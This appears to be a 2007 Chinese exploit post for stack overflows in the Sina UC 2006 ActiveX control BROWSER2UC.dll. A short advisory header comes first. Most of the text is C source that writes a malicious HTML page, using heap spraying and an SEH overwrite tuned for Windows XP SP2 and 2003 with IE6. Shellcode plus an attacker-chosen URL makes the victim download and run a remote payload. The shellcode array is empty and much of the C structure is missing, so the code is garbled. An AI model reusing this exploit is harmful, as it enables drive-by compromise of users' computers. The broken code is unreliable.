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Sina UC 2006 Activex SendChatRoomOpt Exploit
来源:ph4nt0m.org 作者:云舒 发布时间:2007-01-10  

// 新浪UC ActiveX多个远程栈溢出漏洞
// Sowhat of Nevis Labs
// 日期: 2007.01.09
// http://www.nevisnetworks.com
// http://secway.org/advisory/20070109EN.txt
// http://secway.org/advisory/20070109CN.txt
// CVE: 暂无
// 厂商
// Sina Inc.
// 受影响的版本:
// Sina UC <=UC2006
// Overview:
// 新浪UC是中国非常流行的IM工具之一
// http://www.51uc.com
// 细节:
// 漏洞的起因是Sina UC的多个ActiveX控件的参数缺乏必要的验证,攻击者构造恶意网页,可以远程完全控制安装了Sina UC
// 的用户的计算机,
// 多个控件存在栈溢出问题,包括但不限于:
// 1. clsid:77AE4780-75E0-4CB0-A162-D1BBE3D50384
// C:\Program Files\sina\UC\ActiveX\BROWSER2UC.dll
// Sub SendChatRoomOpt (
// ByVal astrVerion As String ,
// ByVal astrUserID As String ,
// ByVal asDataType As Integer ,
// ByVal alTypeID As Long
// )
// 当第1个参数是一个超常字符串时,发生栈溢出,SEH被覆盖,攻击者可以执行任意代码

// Sina UC 2006 Activex SendChatRoomOpt Exploit
// Code by 云舒 & LuoLuo,ph4nt0morg

#include <stdio.h>
#include <stdlib.h>
#include <windows.h>
#include <string.h>

FILE *fp = NULL;
char *file = "fuck_uc.html";
char *url = NULL;

unsigned char sc[] =

char * header =
"C:\Program Files\sina\UC\ActiveX\BROWSER2UC.dll\n\n"

"Sub SendChatRoomOpt (\n"
" ByVal astrVerion As String ,\n"
" ByVal astrUserID As String ,\n"
" ByVal asDataType As Integer ,\n"
" ByVal alTypeID As Long\n"
"ph4nt0m.org, Code By 云舒 & LuoLuo\n"
"<script language=\"javascript\">\n"
"var heapSprayToAddress = 0x0c0c0c0c;\n"
"var shellcode = unescape(\"%u9090\"+\"%u9090\"+ \n";

char * footer =
"var heapBlockSize = 0x100000;\n"
"var payLoadSize = shellcode.length * 2;\n"
"var spraySlideSize = heapBlockSize - (payLoadSize+0x38);\n"
"var spraySlide = unescape(\"%u9090%u9090\");\n\n"
"spraySlide = getSpraySlide(spraySlide,spraySlideSize);\n"
"heapBlocks = (heapSprayToAddress - 0x100000)/heapBlockSize;\n"
"memory = new Array();\n\n"
"for (i=0;i<heapBlocks;i++)\n{\n"
"\t\tmemory = spraySlide + shellcode;\n}\n"

"function getSpraySlide(spraySlide, spraySlideSize)\n{\n\t"
"while (spraySlide.length*2<spraySlideSize)\n\t"
"{\n\t\tspraySlide += spraySlide;\n\t}\n"
"\tspraySlide = spraySlide.substring(0,spraySlideSize/2);\n\treturn spraySlide;\n}\n\n";

// print unicode shellcode
void PrintPayLoad(char *lpBuff, int buffsize)
int i;
for(i=0;i < buffsize;i+=2)
fprintf(fp, "%s", "\" +\n\"");
fprintf(fp, "%s", "\"");
fprintf(fp, "%%u%0.4x",((unsigned short*)lpBuff)[i/2]);
//把shellcode打印在header后面,然后用 " ) " 闭合
fprintf(fp, "%s", "\");\n");

int main( int argc, char *argv[] )
if( argc != 3 )
printf( "\nUC ActiveX object exp,Code by 云舒 & LuoLuo,ph4nt0morg\n" );
printf( "Usage: %s <url> <os>\n", argv[0] );
printf( " 1 Windows XP SP2 Chinese version,IE 6\n" );
printf( " 2 Windows 2003 standard SP1 Chinese Version, IE 6\n" );

return -1;

char seh[1024] = { 0 };
int os = atoi( argv[2] );
int len = 0;

if( os == 1 )
len = 3133;
else if( os == 2 )
len = 3193;

sprintf( seh , "var obj = new ActiveXObject(\"BROWSER2UC.BROWSERToUC\");\n\tvar arg1;\n\n<!-- Windows2003 standard SP1 + IE6 此处覆盖长度i为3193 -->\n<!-- Windows XP SP2 + IE6 此处覆盖长度i为3133 -->\n\nfor( var i = 0; i < %d; i ++ )\n{\targ1 += \"A\";\n}arg1=arg1 + unescape(\"%%0c%%0c%%0c%%0c\");\narg2=\"defaultV\";\narg3=1;\narg4=1;\nobj.SendChatRoomOpt(arg1 ,arg2 ,arg3 ,arg4);\n</script>\n</head>\n</html>", len );

url = argv[1];
if( (!strstr(url, "http://") && !strstr(url, "ftp://")) || strlen(url) < 10)
printf("[-] Invalid url. Must start with 'http://','ftp://'\n");
return -1;

printf("[+] download url:%s\n", url);

fp = fopen( file , "w" );
if( fp == NULL )
printf( "Create file error: %d\n", GetLastError() );
return -1;
fprintf( fp, "%s", header );
fflush( fp );

char buffer[4096] = { 0 };
int sc_len = sizeof(sc)-1;
memcpy(buffer, sc, sc_len);
memcpy(buffer+sc_len, url, strlen(url));

sc_len += strlen(url)+1;
PrintPayLoad((char *)buffer, sc_len);
fflush( fp );

fprintf( fp, "%s", footer );
fprintf( fp, "%s", seh );

fflush( fp );
fclose( fp );

printf( "Create done!please look %s\n", file );

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